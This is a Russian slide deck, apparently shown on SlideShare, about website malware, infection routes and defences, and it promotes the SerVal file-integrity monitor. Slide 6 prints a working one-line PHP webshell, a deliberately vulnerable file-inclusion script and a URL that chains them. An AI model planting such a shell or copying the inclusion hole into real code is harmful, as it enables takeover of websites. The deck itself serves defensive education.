Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SerVal site monitoring presentation - Презентация SerVal

147 views

Published on

Презентация SerVal - система мониторинга безопасности сайта

Published in: Software
  • Be the first to comment

  • Be the first to like this

SerVal site monitoring presentation - Презентация SerVal

  1. 1. Вирусы, трояны, бекдоры на сайтах: пути заражения и варианты защиты Александр Барычев https://www.facebook.com/barychev.alexander alexander@barychev.ru ICQ #143876457 Skype: dimases77
  2. 2. Малварь - злонамеренная программа ● Вирус — заражение посетителя, через уязвимости в браузере ● Троян — управление сайтом, организация ботнета ● Спам-скрипт — рассылка спама ● Размещение ссылок — коды SAPE, Linkfeed, каталоги ссылок ● Клоакинг с переадресацией трафика
  3. 3. Атакуемые файлы ● .js, .swf — используется для распространения вирусов ● .php, .pl, .cgi — серверные скрипты, через них можно делать все, хоть сервер Пентагона брутить ● .htaccess — установка переадресации (как клоакинг) на другие сайты, чаще всего по User Agent ● .htm, .html — статические ссылочные каталоги, залитые через Webshell
  4. 4. Последствия заражения ● Распространение вирусов ● Рассылка спама ● Атака других сайтов ● Пессимизация в поисковых системах ● Блокировка хостинга ● Попадание IP и домена в черные списки Серьезный урон для бизнеса!
  5. 5. Варианты заражения ● «Угон» из сохраненных паролей с зараженного компьютера ● Через уязвимость на сайте, чаще всего через форму загрузки файлов на сайт ● Через уязвимость авторизации в Панели управления ● Через многочисленные плагины к популярным CMS ● XSS, SQL-injection, LFI
  6. 6. Local File Inclusion avatar.jpg Самый простой WebShell: <?assert(stripslashes($_REQUEST["e"]));?> image.php Скрипт с LFI-инъекцией: <?php // {..} примитивная проверка, которая часто легко обходится if (!isset($_GET['file']) OR !file_exists('./tpl/default/'.$_GET['file'])) die('404 Not Found'); // {..} возможно, проводятся еще какие-то проверки include './tpl/default/'.$_GET['file']; // локальный инклуд файла ?> http://site.com/image.php?file=../../upload/avatar.jpg&e=phpinfo();
  7. 7. Крутой WebShell Позволяет: ● Создавать, изменять и удалять любой файл и директорию ● Выполнять произвольный код и команды bash ● Подключаться и управлять БД
  8. 8. Опасные функции PHP ● eval() - выполнение произвольного кода ● assert() - выполнение произвольного кода ● exec(), shell_exec(), system() - выполнение команд консоли ● base64_decode() - декодирование обфусцированного кода ● preg_replace() с модификатором e — выполнение произвольного кода (запрещено с 2012 года)
  9. 9. Кто под угрозой? ● Пользователи популярных и бесплатных CMS Wordpress, Joomla ● Пользователи популярных и платных CMS ● Любители сохранять пароли в FTP и SCP клиентах, браузерах ● Все, кто использует Apache + PHP ● Любой, у кого есть Вебсервер, который «глядит» в Интернет
  10. 10. Так что же делать? ● Обновить все серверное ПО до актуальных версий ● Провести аудит исходного кода скриптов ● Установить все апдейты на CMS, на модули, на плагины ● Запретить доступ к директориям через http в .htaccess, которым это не нужно ● Отслеживать изменения файлов!
  11. 11. система мониторинга целостности файлов сайта www.serval.site
  12. 12. Как использовать SerVal? ● Скачать с сайта http://www.serval.site ● Установить, запустив инсталляцию, на хостинг в отдельный домен, например, http://serval.moisite.ru, настроить планировщик задач Cron. ● Завести проект — сайт который будет мониторится на изменение файлов ● Получить уникальный PHP-файл сканера для сайта и загрузить его на хостинг ● Обращать внимание на изменения, о которых будет уведомлять система http://www.serval.site
  13. 13. Главная страница http://www.serval.site
  14. 14. Список проектов http://www.serval.site
  15. 15. Кейс взлома altika.ru 05 мая 2016 примерно в 0 часов ночи были добавлены 3 файла: ● /thumbs.php [25655B] ● /webim/styles/original/images/buttons/mysql.php [28786B] ● /webim/styles/original/images/mail.php [233B] http://www.serval.site
  16. 16. Кейс взлома altika.ru Добавлены: ● /xml.php [431B] ● /images/data/inc.php [539B] ● /images/hyundai/general.php [8361B] ● /images/hyundai/test.php [442B] ● /images/hyundai/themes.php [8361B] ● /images/main/config.php [592B] ● и другие (всего 20)... Изменены: ● /chapters/daewoo/config.php [2869B] ● /stats/reports/filters.php [7175B] ● /stats/reports/ip.php [1740B] ● /stats/reports/searchpages.php [7193B] ● /stats/reports/servers.php [2588B] ● и другие (всего 24)... 05 мая 2016 примерно в 5-6 часов утра были http://www.serval.site
  17. 17. Все это показал SerVal http://www.serval.site
  18. 18. Кейс взлома allrad.ru http://www.serval.site
  19. 19. При этом главное: ● Быстро выявить взлом ● Устранить последствия ● Проанализировать и устранить уязвимость Взломать могут каждый сайт! Следите за своими сайтами! http://www.serval.site
  20. 20. В этом поможет вот этот милый котик! Скачивайте, устанавливайте, пользуйтесь! http://www.serval.site
  21. 21. Александр Барычев https://www.facebook.com/barychev.alexander alexander@barychev.ru ICQ #143876457 Skype: dimases77 СПАСИБО ЗА ВНИМАНИЕ! http://www.serval.site

×